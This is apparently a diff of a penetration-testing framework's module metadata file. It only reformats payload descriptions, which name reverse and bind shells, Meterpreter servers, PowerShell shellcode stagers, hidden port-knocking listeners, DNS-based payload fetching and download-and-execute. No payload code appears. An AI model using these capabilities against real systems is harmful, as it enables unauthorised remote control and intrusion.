-    "description": "Spawn a piped command shell (sh). Tunnel communication over HTTPS",
+    "description": "Spawn a piped command shell (sh).\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -173315,7 +174161,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (sh). Connect back stager",
+    "description": "Spawn a piped command shell (sh).\n\nConnect back stager",
    "references": [

    ],
@@ -174047,7 +174893,7 @@
      "vlad902 <vlad902@gmail.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection over IPv6",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection over IPv6",
    "references": [

    ],
@@ -174081,7 +174927,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -174115,7 +174961,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -174151,7 +174997,7 @@
      "vlad902 <vlad902@gmail.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker over IPv6",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -174185,7 +175031,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -174427,7 +175273,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -174461,7 +175307,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -175460,7 +176306,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -175495,7 +176341,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -175529,7 +176375,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -175563,7 +176409,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -175597,7 +176443,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -175633,7 +176479,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -175668,7 +176514,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Execute a Python payload from a command. Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -175702,7 +176548,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect to the victim and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect to the victim and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175736,7 +176582,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175770,7 +176616,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175804,7 +176650,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Execute a Python payload from a command. Connect back to the attacker and spawn a Meterpreter shell",
+    "description": "Execute a Python payload from a command.\n\nConnect back to the attacker and spawn a Meterpreter shell",
    "references": [

    ],
@@ -175839,7 +176685,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Listens for a connection from the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -175874,7 +176720,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -175909,7 +176755,7 @@
      "Spencer McIntyre",
      "mumbai"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -175944,7 +176790,7 @@
      "Spencer McIntyre",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -175979,7 +176825,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -176014,7 +176860,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -177335,7 +178181,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -177374,7 +178220,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -177412,7 +178258,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -177451,7 +178297,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -177487,7 +178333,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -177523,7 +178369,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -177561,7 +178407,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -177601,7 +178447,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection",
    "references": [

    ],
@@ -177638,7 +178484,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -177674,7 +178520,7 @@
      "bwatters-r7",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nUse an established connection",
    "references": [

    ],
@@ -177712,7 +178558,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [

    ],
@@ -177748,7 +178594,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [

    ],
@@ -177784,7 +178630,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -177820,7 +178666,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [

    ],
@@ -177858,7 +178704,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [

    ],
@@ -177896,7 +178742,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -177932,7 +178778,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -177968,7 +178814,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -178004,7 +178850,7 @@
      "bwatters-r7",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -178042,7 +178888,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -178080,7 +178926,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -178119,7 +178965,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -178159,7 +179005,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -178199,7 +179045,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -178236,7 +179082,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -178272,7 +179118,7 @@
      "bwatters-r7",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -178309,7 +179155,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [

    ],
@@ -178346,7 +179192,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [

    ],
@@ -178384,7 +179230,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178423,7 +179269,7 @@
      "skape <mmiller@hick.org>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178461,7 +179307,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178500,7 +179346,7 @@
      "skape <mmiller@hick.org>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178537,7 +179383,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178574,7 +179420,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178612,7 +179458,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178652,7 +179498,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178690,7 +179536,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178727,7 +179573,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178766,7 +179612,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178803,7 +179649,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178840,7 +179686,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178878,7 +179724,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178915,7 +179761,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178952,7 +179798,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -178990,7 +179836,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179028,7 +179874,7 @@
      "hdm <x@hdm.io>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179067,7 +179913,7 @@
      "skape <mmiller@hick.org>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179107,7 +179953,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179147,7 +179993,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179185,7 +180031,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179223,7 +180069,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179259,7 +180105,7 @@
      "Spencer McIntyre",
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Performs a TXT query against a series of DNS record(s) and executes the returned payload",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nPerforms a TXT query against a series of DNS record(s) and executes the returned payload",
    "references": [

    ],
@@ -179294,7 +180140,7 @@
      "Spencer McIntyre",
      "corelanc0d3r <peter.ve@corelan.be>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Download an EXE from an HTTP(S)/FTP URL and execute it",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nDownload an EXE from an HTTP(S)/FTP URL and execute it",
    "references": [

    ],
@@ -179405,7 +180251,7 @@
      "Spencer McIntyre",
      "robert <robertmetasploit@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Generate a debug trap in the target process",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a debug trap in the target process",
    "references": [

    ],
